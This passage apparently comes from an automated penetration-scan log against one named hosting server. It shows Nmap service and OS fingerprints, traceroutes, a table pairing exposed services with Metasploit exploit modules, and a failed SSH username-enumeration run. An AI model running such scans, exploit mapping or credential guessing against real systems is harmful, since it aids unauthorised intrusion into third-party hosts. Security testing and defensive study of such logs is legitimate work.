406615 309.18 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
406716 286.55 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
406817 309.25 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
406918 286.59 ms 38.32.13.210
407019 286.66 ms ip-143-95-110-248.iplocal (143.95.110.248)
4071
4072NSE: Script Post-scanning.
4073Initiating NSE at 07:16
4074Completed NSE at 07:16, 0.05s elapsed
4075Initiating NSE at 07:16
4076Completed NSE at 07:16, 0.05s elapsed
4077#####################################################################################################################################
4078+----------------------+--------------------------------------+------------------------------------------------+----------+----------+
4079| App Name | URL to Application | Potential Exploit | Username | Password |
4080+----------------------+--------------------------------------+------------------------------------------------+----------+----------+
4081| Linksys WRT54GL | https://143.95.110.248:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
4082| JBoss Status Servlet | https://143.95.110.248:8443/status | ./auxiliary/scanner/http/jboss_status.rb | None | None |
4083+----------------------+--------------------------------------+------------------------------------------------+----------+----------+
4084#####################################################################################################################################
4085Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:40 EST
4086Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4087Host is up (0.35s latency).
4088Not shown: 458 closed ports, 7 filtered ports
4089Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
4090PORT STATE SERVICE VERSION
409121/tcp open ftp Pure-FTPd
4092| ssl-cert: Subject: commonName=*.accountservergroup.com
4093| Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
4094| Not valid before: 2019-08-28T00:00:00
4095|_Not valid after: 2021-11-29T00:00:00
4096|_ssl-date: 2020-03-02T11:41:29+00:00; -4s from scanner time.
409722/tcp open ssh OpenSSH 5.3 (protocol 2.0)
4098| ssh-hostkey:
4099| 1024 1c:ed:a8:ec:f4:00:41:de:5c:c3:ff:e8:e9:22:8c:55 (DSA)
4100|_ 2048 8b:b7:2d:de:08:b5:36:1c:37:9b:28:36:50:b4:a3:23 (RSA)
410125/tcp open smtp Exim smtpd 4.91
4102|_smtp-commands: Couldn't establish connection on port 25
4103| ssl-cert: Subject: commonName=*.accountservergroup.com
4104| Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
4105| Not valid before: 2019-08-28T00:00:00
4106|_Not valid after: 2021-11-29T00:00:00
4107|_ssl-date: 2020-03-02T11:41:28+00:00; -3s from scanner time.
410853/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4109| dns-nsid:
4110|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6
4111110/tcp open pop3 Dovecot pop3d
4112|_pop3-capabilities: CAPA UIDL STLS PIPELINING TOP USER SASL(PLAIN LOGIN) AUTH-RESP-CODE RESP-CODES
4113|_ssl-date: 2020-03-02T11:41:29+00:00; -4s from scanner time.
4114143/tcp open imap Dovecot imapd
4115|_imap-capabilities: IMAP4rev1 listed post-login more ID NAMESPACE Pre-login IDLE LITERAL+ capabilities OK LOGIN-REFERRALS have AUTH=LOGINA0001 SASL-IR AUTH=PLAIN ENABLE STARTTLS
4116|_ssl-date: 2020-03-02T11:41:30+00:00; -4s from scanner time.
4117465/tcp open ssl/smtp Exim smtpd 4.91
4118|_smtp-commands: Couldn't establish connection on port 465
4119| ssl-cert: Subject: commonName=*.accountservergroup.com
4120| Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
4121| Not valid before: 2019-08-28T00:00:00
4122|_Not valid after: 2021-11-29T00:00:00
4123|_ssl-date: 2020-03-02T11:41:21+00:00; -4s from scanner time.
4124587/tcp open tcpwrapped
4125|_smtp-commands: Couldn't establish connection on port 587
4126993/tcp open ssl/imaps?
4127|_ssl-date: 2020-03-02T11:41:21+00:00; -4s from scanner time.
4128995/tcp open ssl/pop3s?
4129|_ssl-date: 2020-03-02T11:41:21+00:00; -4s from scanner time.
41303306/tcp open mysql MySQL 5.6.41-84.1
4131| mysql-info:
4132| Protocol: 10
4133| Version: 5.6.41-84.1
4134| Thread ID: 55588886
4135| Capabilities flags: 63487
4136| Some Capabilities: SupportsCompression, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, LongPassword, SupportsTransactions, ODBCClient, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, FoundRows, InteractiveClient, Speaks41ProtocolNew, Support41Auth, IgnoreSigpipes, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
4137| Status: Autocommit
4138| Salt: tB)Ea96B*Iq}Cs:dkkZ_
4139|_ Auth Plugin Name: mysql_native_password
4140Device type: router
4141Running: MikroTik RouterOS 5.X, Linux 2.6.X
4142OS CPE: cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35
4143OS details: MikroTik RouterOS 5.25 (Linux 2.6.35)
4144Network Distance: 19 hops
4145Service Info: Host: uscentral421.accountservergroup.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4146
4147Host script results:
4148|_clock-skew: mean: -4s, deviation: 0s, median: -4s
4149
4150TRACEROUTE (using port 25/tcp)
4151HOP RTT ADDRESS
41521 355.97 ms 10.202.8.1
41532 356.00 ms 185.32.222.3
41543 356.02 ms slx9540-40gb.datasource.ch (91.201.58.73)
41554 356.07 ms zch-b2-link.telia.net (62.115.180.122)
41565 369.21 ms ffm-bb1-link.telia.net (62.115.142.110)
41576 369.22 ms ffm-b5-link.telia.net (62.115.114.91)
41587 369.25 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
41598 369.23 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
41609 246.54 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
416110 254.38 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
416211 254.44 ms be3043.ccr22.ymq01.atlas.cogentco.com (154.54.44.166)
416312 254.38 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
416413 254.43 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
416514 254.38 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
416615 387.99 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
416716 387.99 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
416817 388.02 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
416918 388.03 ms 38.32.13.210
417019 388.02 ms ip-143-95-110-248.iplocal (143.95.110.248)
4171######################################################################################################################################
4172Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:43 EST
4173Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4174Host is up (0.26s latency).
4175Not shown: 20 closed ports
4176PORT STATE SERVICE VERSION
417753/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
417853/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4179| dns-nsid:
4180|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6
418167/udp open|filtered dhcps
418268/udp open|filtered dhcpc
418369/udp open|filtered tftp
4184137/udp open|filtered netbios-ns
4185139/udp open|filtered netbios-ssn
4186520/udp open|filtered route
4187Aggressive OS guesses: Linux 3.2 - 3.8 (92%), Grandstream GXV3275 video phone (91%), Linux 3.3 (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 2.6.39 (90%), Linux 3.10 (89%), Check Point UTM-1 Edge X firewall (89%), Linux 2.6.32 or 3.10 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%)
4188No exact OS matches for host (test conditions non-ideal).
4189Network Distance: 19 hops
4190Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4191
4192TRACEROUTE (using port 53/tcp)
4193HOP RTT ADDRESS
41941 356.09 ms 10.202.8.1
41952 356.13 ms 185.32.222.3
41963 356.15 ms slx9540-40gb.datasource.ch (91.201.58.73)
41974 356.19 ms zch-b2-link.telia.net (62.115.180.122)
41985 366.11 ms ffm-bb2-link.telia.net (62.115.142.104)
41996 366.10 ms ffm-b5-link.telia.net (62.115.114.91)
42007 366.09 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
42018 366.13 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
42029 366.17 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
420310 271.86 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
420411 271.81 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
420512 271.87 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
420613 271.89 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
420714 271.91 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
420815 393.99 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
420916 393.95 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
421017 394.01 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
421118 394.00 ms 38.32.13.210
421219 394.06 ms ip-143-95-110-248.iplocal (143.95.110.248)
4213######################################################################################################################################
4214Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:45 EST
4215Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4216Host is up (0.31s latency).
4217
4218PORT STATE SERVICE VERSION
421921/tcp open ftp Pure-FTPd
4220Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4221Aggressive OS guesses: Tomato 1.28 (Linux 2.4.20) (97%), Tomato firmware (Linux 2.6.22) (97%), MikroTik RouterOS 5.25 (Linux 2.6.35) (93%), Sony Ericsson U8i Vivaz mobile phone (92%), DD-WRT (Linux 2.4.36) (92%), Cisco Unified Communications Manager VoIP adapter (91%), Android 7.1.2 (Linux 3.10) (91%), Lexmark Z2400 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (91%), DD-WRT v23 (Linux 2.4.36) (91%)
4222No exact OS matches for host (test conditions non-ideal).
4223Network Distance: 19 hops
4224
4225TRACEROUTE (using port 21/tcp)
4226HOP RTT ADDRESS
42271 356.63 ms 10.202.8.1
42282 356.66 ms 185.32.222.3
42293 356.69 ms slx9540-40gb.datasource.ch (91.201.58.73)
42304 356.75 ms zch-b2-link.telia.net (62.115.180.122)
42315 356.48 ms ffm-bb2-link.telia.net (62.115.142.104)
42326 366.51 ms ffm-b5-link.telia.net (62.115.114.91)
42337 366.55 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
42348 366.57 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
42359 243.82 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
423610 303.01 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
423711 303.04 ms be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162)
423812 303.02 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
423913 303.05 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
424014 303.07 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
424115 424.97 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
424216 424.96 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
424317 425.01 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
424418 424.99 ms 38.32.13.210
424519 ... 30
4246#####################################################################################################################################
4247Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 06:56 EST
4248Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4249Host is up (0.29s latency).
4250
4251PORT STATE SERVICE VERSION
425222/tcp closed ssh
4253Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4254Device type: firewall|general purpose|storage-misc|media device|router
4255Running: Check Point embedded, Linux 2.6.X, Cisco embedded, Synology DiskStation Manager 3.X, Polycom embedded, MikroTik RouterOS 5.X
4256OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:cisco:sa520 cpe:/o:linux:linux_kernel:2.6.32 cpe:/a:synology:diskstation:3.2 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35
4257OS details: Check Point UTM-1 Edge X firewall, Cisco SA520 firewall (Linux 2.6), Linux 2.6.32, Synology DS209 NAS device (Linux 2.6.32) or Polycom HDX 7000 Touch Control, MikroTik RouterOS 5.25 (Linux 2.6.35)
4258Network Distance: 19 hops
4259
4260TRACEROUTE (using port 22/tcp)
4261HOP RTT ADDRESS
42621 329.31 ms 10.202.8.1
42632 329.36 ms 185.32.222.3
42643 329.39 ms slx9540-40gb.datasource.ch (91.201.58.73)
42654 329.42 ms zch-b2-link.telia.net (62.115.180.122)
42665 329.47 ms ffm-bb1-link.telia.net (62.115.142.110)
42676 329.47 ms ffm-b5-link.telia.net (62.115.114.91)
42687 329.52 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
42698 329.58 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
42709 237.65 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
427110 380.09 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
427211 380.16 ms be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162)
427312 349.48 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
427413 380.16 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
427514 380.21 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
427615 380.38 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
427716 380.29 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
427817 470.09 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
427918 380.39 ms 38.32.13.210
428019 380.32 ms ip-143-95-110-248.iplocal (143.95.110.248)
4281######################################################################################################################################
4282USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
4283RHOSTS => 143.95.110.248
4284RHOST => 143.95.110.248
4285[*] 143.95.110.248:22 - SSH - Using malformed packet technique
4286[*] 143.95.110.248:22 - SSH - Starting scan
4287[-] 143.95.110.248:22 - SSH - User 'admin' on could not connect
4288[-] 143.95.110.248:22 - SSH - User 'administrator' on could not connect
4289[-] 143.95.110.248:22 - SSH - User 'anonymous' on could not connect
4290[-] 143.95.110.248:22 - SSH - User 'backup' on could not connect
4291[-] 143.95.110.248:22 - SSH - User 'bee' on could not connect
4292[-] 143.95.110.248:22 - SSH - User 'ftp' on could not connect
4293[-] 143.95.110.248:22 - SSH - User 'guest' on could not connect
4294[-] 143.95.110.248:22 - SSH - User 'GUEST' on could not connect
4295[-] 143.95.110.248:22 - SSH - User 'info' on could not connect
4296[-] 143.95.110.248:22 - SSH - User 'mail' on could not connect
4297[-] 143.95.110.248:22 - SSH - User 'mailadmin' on could not connect
4298[-] 143.95.110.248:22 - SSH - User 'msfadmin' on could not connect
4299[-] 143.95.110.248:22 - SSH - User 'mysql' on could not connect
4300[-] 143.95.110.248:22 - SSH - User 'nobody' on could not connect
4301[-] 143.95.110.248:22 - SSH - User 'oracle' on could not connect
4302[-] 143.95.110.248:22 - SSH - User 'owaspbwa' on could not connect
4303[-] 143.95.110.248:22 - SSH - User 'postfix' on could not connect
4304[-] 143.95.110.248:22 - SSH - User 'postgres' on could not connect
4305[-] 143.95.110.248:22 - SSH - User 'private' on could not connect
4306[-] 143.95.110.248:22 - SSH - User 'proftpd' on could not connect
4307[-] 143.95.110.248:22 - SSH - User 'public' on could not connect
4308[-] 143.95.110.248:22 - SSH - User 'root' on could not connect
4309[-] 143.95.110.248:22 - SSH - User 'superadmin' on could not connect
4310[-] 143.95.110.248:22 - SSH - User 'support' on could not connect
4311[-] 143.95.110.248:22 - SSH - User 'sys' on could not connect
4312[-] 143.95.110.248:22 - SSH - User 'system' on could not connect
4313[-] 143.95.110.248:22 - SSH - User 'systemadmin' on could not connect
4314[-] 143.95.110.248:22 - SSH - User 'systemadministrator' on could not connect
4315[-] 143.95.110.248:22 - SSH - User 'test' on could not connect
4316[-] 143.95.110.248:22 - SSH - User 'tomcat' on could not connect
4317[-] 143.95.110.248:22 - SSH - User 'user' on could not connect
4318[-] 143.95.110.248:22 - SSH - User 'webmaster' on could not connect
4319[-] 143.95.110.248:22 - SSH - User 'www-data' on could not connect
4320[-] 143.95.110.248:22 - SSH - User 'Fortimanager_Access' on could not connect
4321[*] Scanned 1 of 1 hosts (100% complete)
4322[*] Auxiliary module execution completed
4323######################################################################################################################################
4324Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:05 EST
4325WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
4326WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
4327WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
4328WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
4329WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
4330WARNING: RST from 143.95.110.248 port 25 -- is this port really open?
4331Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4332Host is up (0.43s latency).
4333
4334PORT STATE SERVICE VERSION
433525/tcp open smtp Exim smtpd 4.91
4336|_smtp-commands: Couldn't establish connection on port 25
4337| smtp-enum-users:
4338|_ Couldn't establish connection on port 25
4339|_smtp-open-relay: Couldn't establish connection on port 25
4340Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4341Aggressive OS guesses: Motorola RFS 6000 wireless switch (94%), Konica Minolta 1600f printer (91%), ZyXEL ZyWALL 2 firewall or Prestige 660HW-61 ADSL router (ZyNOS 3.62) (89%), Kyocera CopyStar CS-2560 printer (88%), DD-WRT (Linux 2.4.35s) (88%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), Linux 2.6.18 - 2.6.22 (88%), Linux 3.2.0 (88%), MikroTik RouterOS 6.15 (Linux 3.3.5) (88%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (86%)
4342No exact OS matches for host (test conditions non-ideal).
4343Network Distance: 19 hops
4344Service Info: Host: uscentral421.accountservergroup.com
4345
4346TRACEROUTE (using port 25/tcp)
4347HOP RTT ADDRESS
43481 365.43 ms 10.202.8.1
43492 365.47 ms 185.32.222.3
43503 365.50 ms core02-40gb.datasource.ch (91.201.58.73)
43514 365.52 ms zch-b2-link.telia.net (62.115.180.122)
43525 365.57 ms ffm-bb2-link.telia.net (62.115.142.104)
43536 365.56 ms ffm-b5-link.telia.net (62.115.114.91)
43547 365.61 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
43558 365.60 ms be3187.ccr42.fra03.atlas.cogentco.com (130.117.1.118)
43569 365.70 ms be2814.ccr42.ams03.atlas.cogentco.com (130.117.0.141)
435710 384.19 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
435811 384.14 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
435912 384.22 ms be3599.ccr21.alb02.atlas.cogentco.com (66.28.4.237)
436013 384.26 ms be2993.ccr21.cle04.atlas.cogentco.com (154.54.31.225)
436114 384.25 ms be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129)
436215 384.37 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
436316 384.34 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)
436417 384.36 ms be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.5.238)
436518 384.41 ms 38.32.13.210
436619 384.36 ms ip-143-95-110-248.iplocal (143.95.110.248)
4367######################################################################################################################################
4368Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:06 EST
4369Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4370Host is up (0.28s latency).
4371
4372PORT STATE SERVICE VERSION
437353/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4374|_dns-fuzz: Server didn't response to our probe, can't fuzz
4375| dns-nsec-enum:
4376|_ No NSEC records found
4377| dns-nsec3-enum:
4378|_ DNSSEC NSEC3 not supported
4379| dns-nsid:
4380|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6
4381Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4382Aggressive OS guesses: Grandstream GXV3275 video phone (91%), Linux 3.2 - 3.8 (91%), Linux 3.3 (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Linux 2.6.18 - 2.6.22 (90%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%), Linux 2.6.32 (89%), MikroTik RouterOS 6.32.1 (89%), Linux 2.6.32 - 2.6.39 (89%), Linux 3.10 (88%)
4383No exact OS matches for host (test conditions non-ideal).
4384Network Distance: 19 hops
4385Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4386
4387Host script results:
4388| dns-brute:
4389|_ DNS Brute-force hostnames: No results.
4390
4391TRACEROUTE (using port 53/tcp)
4392HOP RTT ADDRESS
43931 235.04 ms 10.202.8.1
43942 398.60 ms 185.32.222.3
43953 398.64 ms slx9540-40gb.datasource.ch (91.201.58.73)
43964 398.65 ms zch-b2-link.telia.net (62.115.180.122)
43975 398.70 ms ffm-bb1-link.telia.net (62.115.142.110)
43986 398.67 ms ffm-b5-link.telia.net (62.115.114.91)
43997 398.74 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
44008 398.75 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
44019 243.99 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
440210 465.43 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
440311 465.45 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
440412 334.52 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
440513 465.44 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
440614 465.49 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
440715 465.53 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
440816 465.54 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
440917 465.60 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
441018 465.58 ms 38.32.13.210
441119 465.66 ms ip-143-95-110-248.iplocal (143.95.110.248)
4412#####################################################################################################################################
4413Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:06 EST
4414Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4415Host is up (0.24s latency).
4416
4417PORT STATE SERVICE VERSION
441867/tcp closed dhcps
441967/udp closed dhcps
4420Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4421Device type: firewall|general purpose|storage-misc|media device|router
4422Running: Check Point embedded, Linux 2.6.X, Cisco embedded, Synology DiskStation Manager 3.X, Polycom embedded, MikroTik RouterOS 5.X
4423OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:cisco:sa520 cpe:/o:linux:linux_kernel:2.6.32 cpe:/a:synology:diskstation:3.2 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35
4424OS details: Check Point UTM-1 Edge X firewall, Cisco SA520 firewall (Linux 2.6), Linux 2.6.32, Synology DS209 NAS device (Linux 2.6.32) or Polycom HDX 7000 Touch Control, MikroTik RouterOS 5.25 (Linux 2.6.35)
4425Network Distance: 19 hops
4426
4427TRACEROUTE (using port 67/tcp)
4428HOP RTT ADDRESS
44291 412.98 ms 10.202.8.1
44302 413.04 ms 185.32.222.3
44313 413.06 ms slx9540-40gb.datasource.ch (91.201.58.73)
44324 413.12 ms zch-b2-link.telia.net (62.115.180.122)
44335 413.15 ms ffm-bb2-link.telia.net (62.115.142.104)
44346 130.26 ms ffm-b5-link.telia.net (62.115.114.89)
44357 413.18 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
44368 413.21 ms be3187.ccr42.fra03.atlas.cogentco.com (130.117.1.118)
44379 290.91 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
443810 269.27 ms be2182.ccr21.lpl01.atlas.cogentco.com (154.54.77.246)
443911 269.32 ms be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162)
444012 269.26 ms be3599.ccr21.alb02.atlas.cogentco.com (66.28.4.237)
444113 269.36 ms be2993.ccr21.cle04.atlas.cogentco.com (154.54.31.225)
444214 269.33 ms be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129)
444315 396.23 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
444416 269.40 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)
444517 270.71 ms be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.5.238)
444618 269.46 ms 38.32.13.210
444719 269.49 ms ip-143-95-110-248.iplocal (143.95.110.248)
4448######################################################################################################################################
4449Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:07 EST
4450Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4451Host is up (0.22s latency).
4452
4453PORT STATE SERVICE VERSION
445468/tcp closed dhcpc
445568/udp closed dhcpc
4456Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4457Device type: firewall|general purpose|storage-misc|media device|router
4458Running: Check Point embedded, Linux 2.6.X, Cisco embedded, Synology DiskStation Manager 3.X, Polycom embedded, MikroTik RouterOS 5.X
4459OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:cisco:sa520 cpe:/o:linux:linux_kernel:2.6.32 cpe:/a:synology:diskstation:3.2 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35
4460OS details: Check Point UTM-1 Edge X firewall, Cisco SA520 firewall (Linux 2.6), Linux 2.6.32, Synology DS209 NAS device (Linux 2.6.32) or Polycom HDX 7000 Touch Control, MikroTik RouterOS 5.25 (Linux 2.6.35)
4461Network Distance: 19 hops
4462
4463TRACEROUTE (using port 68/tcp)
4464HOP RTT ADDRESS
44651 356.33 ms 10.202.8.1
44662 356.38 ms 185.32.222.3
44673 356.41 ms core02-40gb.datasource.ch (91.201.58.73)
44684 356.48 ms zch-b2-link.telia.net (62.115.180.122)
44695 244.05 ms ffm-bb2-link.telia.net (62.115.142.104)
44706 243.96 ms ffm-b5-link.telia.net (62.115.114.89)
44717 244.06 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
44728 132.30 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
44739 253.99 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
447410 320.70 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
447511 333.46 ms be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162)
447612 333.57 ms be3628.ccr42.jfk02.atlas.cogentco.com (154.54.27.169)
447713 320.75 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
447814 333.56 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
447915 455.91 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165)
448016 455.88 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
448117 455.96 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
448218 455.96 ms 38.32.13.210
448319 456.05 ms ip-143-95-110-248.iplocal (143.95.110.248)
4484######################################################################################################################################
4485Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:07 EST
4486Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4487Host is up (0.28s latency).
4488
4489PORT STATE SERVICE VERSION
449069/tcp closed tftp
449169/udp closed tftp
4492Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4493Device type: firewall|general purpose|storage-misc|media device|router
4494Running: Check Point embedded, Linux 2.6.X, Cisco embedded, Synology DiskStation Manager 3.X, Polycom embedded, MikroTik RouterOS 5.X
4495OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:cisco:sa520 cpe:/o:linux:linux_kernel:2.6.32 cpe:/a:synology:diskstation:3.2 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35
4496OS details: Check Point UTM-1 Edge X firewall, Cisco SA520 firewall (Linux 2.6), Linux 2.6.32, Synology DS209 NAS device (Linux 2.6.32) or Polycom HDX 7000 Touch Control, MikroTik RouterOS 5.25 (Linux 2.6.35)
4497Network Distance: 19 hops
4498
4499TRACEROUTE (using port 69/tcp)
4500HOP RTT ADDRESS
45011 232.11 ms 10.202.8.1
45022 232.12 ms 185.32.222.3
45033 232.16 ms slx9540-40gb.datasource.ch (91.201.58.73)
45044 241.56 ms zch-b2-link.telia.net (62.115.180.122)
45055 241.62 ms ffm-bb2-link.telia.net (62.115.142.104)
45066 241.61 ms ffm-b5-link.telia.net (62.115.114.89)
45077 241.65 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
45088 241.67 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
45099 241.71 ms be2814.ccr42.ams03.atlas.cogentco.com (130.117.0.141)
451010 363.13 ms be2182.ccr21.lpl01.atlas.cogentco.com (154.54.77.246)
451111 363.15 ms be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162)
451212 363.12 ms be3599.ccr21.alb02.atlas.cogentco.com (66.28.4.237)
451313 363.11 ms be2878.ccr21.cle04.atlas.cogentco.com (154.54.26.129)
